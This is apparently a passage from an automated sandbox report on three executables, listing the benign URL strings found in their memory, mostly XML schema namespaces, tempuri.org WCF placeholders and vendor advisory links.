                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyLt
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549862418.0000000002840000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: DA6F.exe, 00000011.00000002.565184895.0000000003F37000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response0ru
                      Source: 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponsePp
                      Source: E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.565184895.0000000003F37000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Responsex
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: DA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549862418.0000000002840000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549862418.0000000002840000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553806969.0000000002A53000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: 2D0D.exe, 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
